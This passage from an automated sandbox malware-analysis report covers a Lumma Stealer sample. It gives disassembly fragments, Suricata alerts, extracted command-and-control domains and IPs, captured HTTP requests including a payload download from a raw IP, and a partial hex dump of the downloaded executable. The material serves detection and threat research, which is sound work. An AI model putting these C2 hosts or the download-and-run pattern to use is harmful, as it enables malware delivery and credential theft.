Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	1_2_0092E1E7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093B05B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0094B2C4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0094B2C4
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0094B2CF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0094B2CF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	1_2_0091D25A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	1_2_0091D25A
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_0094C268
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp al, 2Eh	1_2_009363B6
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0094B3FC
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	1_2_0094B2C2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	1_2_0094B2C2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	1_2_009354D1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebx, edi	1_2_0092D4D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	1_2_0093559D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_009355B3
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	1_2_0093552B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_0092C528
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	1_2_0094D557
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	1_2_0094D557
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	1_2_00926544
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	1_2_0092554C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093C6C3
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	1_2_0093A637
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, eax	1_2_00937797
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp ecx	1_2_0094C79B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	1_2_009287DF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	1_2_009277E9
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then jmp eax	1_2_00936739
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0093B763
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093B763
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	1_2_00943897
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0093C8B1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	1_2_00930817
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00924806
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	1_2_0093B75E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0093B75E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0093C99C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0093C98D
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	1_2_009299D7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	1_2_0094A9DE
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	1_2_009389C0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	1_2_00926907
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov eax, edx	1_2_0092C921
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_0093C94B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	1_2_00919967
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	1_2_00919967
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	1_2_00919967
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	1_2_0091EAA2
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0091DA09
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	1_2_0091DA09
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0091ABA7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov edx, ecx	1_2_0091ABA7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	1_2_00935BF7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ecx, di	1_2_00935BF7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	1_2_0091CB7E
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov esi, eax	1_2_00933C9B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_00939C17
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	1_2_0092EC17
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	1_2_0094BC08
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	1_2_00946C3B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	1_2_0094CD87
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_0094AD19
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	1_2_00946E67
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	1_2_0091DF8C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	1_2_0094CFC7
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [ebx], dx	1_2_00928F35
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_00928F35
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov ecx, eax	1_2_00931F77
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	1_2_00925F79

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:53059 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:61751 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:51917 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:56160 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:53885 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.4:58921 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.4:57451 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.4:64826 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.4:50660 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49736 -> 23.55.153.106:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: immureprech.biz
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou

Performs DNS queries to domains with low reputation

Source:	DNS query: effecterectz.xyz
Source:	DNS query: diffuculttan.xyz
Source:	DNS query: debonairnukk.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 08:23:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 15 Dec 2024 08:15:01 GMTETag: "58600-6294aa91c6503"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 104.21.22.222 104.21.22.222
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 23.55.153.106 23.55.153.106

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=441f5f15ce21037eb22fdf8f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 15 Dec 2024 08:23:39 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlF equals www.youtube.com (Youtube)
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net 